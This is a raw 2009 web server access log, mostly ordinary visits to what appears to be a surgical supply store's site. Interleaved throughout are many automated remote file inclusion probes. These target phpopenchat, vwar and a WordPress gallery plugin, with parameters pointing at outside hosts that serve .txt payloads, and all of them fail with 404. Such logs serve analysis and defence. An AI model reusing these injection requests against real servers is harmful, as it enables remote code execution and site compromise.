84.201.208.50 - - [16/Jul/2009:02:44:25 -0400] "GET /logs/access_log.Q109060200%20%20//vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:30 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:30 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:30 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:30 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:30 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:44:30 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
89.244.145.67 - - [16/Jul/2009:02:44:40 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:44:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:44:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:44:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.249.68.247 - - [16/Jul/2009:02:44:45 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
124.0.237.140 - - [16/Jul/2009:02:44:51 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:02:44:51 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:02:44:51 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:02:44:56 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:02:44:56 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:02:44:56 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:45:14 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:45:14 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.244.145.67 - - [16/Jul/2009:02:45:24 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:25 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:25 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:25 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:25 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:25 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:26 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:26 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:26 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:26 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:26 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:26 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:26 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:26 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:26 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:27 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:27 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:27 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:27 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:28 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.23.2.21 - - [16/Jul/2009:02:45:32 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:45:32 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:45:32 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
89.244.145.67 - - [16/Jul/2009:02:45:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:33 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L010C864B4174E500EDA1082+M37+ENG HTTP/1.1" 200 70587 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:36 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010C864B4174E500EDA1082+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:36 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010C864B4174E500EDA1082+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:36 -0400] "GET /images/items/NUOSSCOLLAGEN_THUMB.JPG HTTP/1.1" 200 2818 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010C864B4174E500EDA1082+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:36 -0400] "GET /images/items/5099001_THUMB.JPG HTTP/1.1" 200 2313 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010C864B4174E500EDA1082+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:36 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010C864B4174E500EDA1082+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:36 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:54 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010C864B4174E500EDA1082+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:45:55 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.23.2.21 - - [16/Jul/2009:02:46:01 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:46:01 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:46:01 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
82.197.131.40 - - [16/Jul/2009:02:46:03 -0400] "GET /logs/access_log.Q109052900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
82.197.131.40 - - [16/Jul/2009:02:46:03 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.244.145.67 - - [16/Jul/2009:02:46:04 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:46:05 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.244.145.67 - - [16/Jul/2009:02:46:05 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
84.201.208.50 - - [16/Jul/2009:02:46:06 -0400] "GET /logs/access_log.Q109050900%20%20//vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:02:46:11 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:46:19 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:46:23 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:46:23 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:46:23 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:02:46:32 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
